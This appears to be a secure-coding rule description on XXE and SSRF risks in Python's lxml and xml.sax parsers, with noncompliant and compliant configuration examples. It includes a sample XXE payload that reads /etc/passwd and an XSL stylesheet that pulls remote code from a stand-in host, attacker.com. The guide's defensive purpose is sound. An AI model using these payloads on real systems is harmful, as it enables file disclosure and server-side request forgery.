XML specification allows the use of entities that can be internal or external (file system / network access ...) which could lead to vulnerabilities such as confidential file disclosures or SSRFs.
Example in this XML document, an external entity read the /etc/passwd file:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<note xmlns="http://www.w3schools.com" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<to>&xxe;</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>
In this XSL document, network access is allowed which can lead to SSRF vulnerabilities:
<?xml version="1.0" encoding="UTF-8"?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.attacker.com/evil.xsl"> <xsl:import href="http://www.attacker.com/evil.xsl"/> <xsl:include href="http://www.attacker.com/evil.xsl"/> <xsl:template match="/"> &content; </xsl:template> </xsl:stylesheet>
It is recommended to disable access to external entities and network access in general.
lxml module:
parser = etree.XMLParser() # Noncompliant: by default resolve_entities is set to true
tree1 = etree.parse('ressources/xxe.xml', parser)
root1 = tree1.getroot()
parser = etree.XMLParser(resolve_entities=True) # Noncompliant
tree1 = etree.parse('ressources/xxe.xml', parser)
root1 = tree1.getroot()
parser = etree.XMLParser(resolve_entities=True) # Noncompliant
treexsd = etree.parse('ressources/xxe.xsd', parser)
rootxsd = treexsd.getroot()
schema = etree.XMLSchema(rootxsd)
ac = etree.XSLTAccessControl(read_network=True, write_network=False) # Noncompliant, read_network is set to true/network access is authorized transform = etree.XSLT(rootxsl, access_control=ac)
xml.sax module:
parser = xml.sax.make_parser()
myHandler = MyHandler()
parser.setContentHandler(myHandler)
parser.setFeature(feature_external_ges, True) # Noncompliant
parser.parse("ressources/xxe.xml")
lxml module:
resolve_entities and network access:
parser = etree.XMLParser(resolve_entities=False, no_network=True) # Compliant
tree1 = etree.parse('ressources/xxe.xml', parser)
root1 = tree1.getroot()
parser = etree.XMLParser(resolve_entities=False) # Compliant: by default no_network is set to true
treexsd = etree.parse('ressources/xxe.xsd', parser)
rootxsd = treexsd.getroot()
schema = etree.XMLSchema(rootxsd) # Compliant
parser = etree.XMLParser(resolve_entities=False) # Compliant
treexsl = etree.parse('ressources/xxe.xsl', parser)
rootxsl = treexsl.getroot()
ac = etree.XSLTAccessControl.DENY_ALL # Compliant
transform = etree.XSLT(rootxsl, access_control=ac) # Compliant
To prevent xxe attacks with xml.sax module (for other security reasons than XXE, xml.sax is not recommended):
parser = xml.sax.make_parser()
myHandler = MyHandler()
parser.setContentHandler(myHandler)
parser.parse("ressources/xxe.xml") # Compliant: in version 3.7.1: The SAX parser no longer processes general external entities by default
parser.setFeature(feature_external_ges, False) # Compliant
parser.parse("ressources/xxe.xml")